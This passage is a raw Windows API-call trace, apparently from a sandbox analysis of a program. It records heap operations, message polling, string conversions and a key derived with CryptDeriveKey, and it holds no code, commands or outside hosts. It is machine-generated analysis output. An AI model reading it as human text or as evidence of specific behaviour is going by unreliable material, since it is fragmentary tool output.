lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0187.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0187.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0187.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0187.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0187.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0187.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0187.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0187.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0187.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0187.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0187.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0187.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0187.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0187.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0187.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0187.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0187.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0187.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0187.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0187.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0187.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0187.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0187.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0187.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0187.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0187.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0187.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0187.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0187.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0187.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0187.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0187.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0187.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0187.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0187.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0187.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0187.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0187.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0187.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0187.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0187.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0187.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0187.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0187.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0187.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0187.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0187.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0187.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0187.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0187.761] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.761] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0187.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0187.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0187.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0187.761] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0187.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0187.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0187.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0187.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0187.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0187.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0187.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0187.770] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0187.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0187.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0187.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0187.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0187.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0187.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0187.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0187.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0187.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0187.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0187.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0187.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0187.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0187.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0187.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0187.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0187.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0187.772] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0187.772] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0187.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0187.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0187.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0187.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0187.772] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0187.772] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.773] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0187.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0187.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0187.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0187.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0187.773] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0187.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0187.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0187.773] CryptHashData (hHash=0xaa57e0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0187.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0187.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0187.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0187.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0187.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0187.774] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0187.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0187.775] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.775] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0187.775] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0187.775] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0187.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0187.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0187.776] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0187.776] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.776] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0187.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0187.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0187.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0187.776] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0187.776] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0187.777] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0187.777] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.777] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0187.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0187.777] CryptDeriveKey (in: hProv=0xab26f0, Algid=0x6601, hBaseData=0xaa57e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5920) returned 1 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0187.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0187.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0187.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0187.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0187.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0187.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0187.778] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0187.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0187.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0187.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0187.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0187.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0187.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0187.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.779] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.779] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0187.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0187.779] 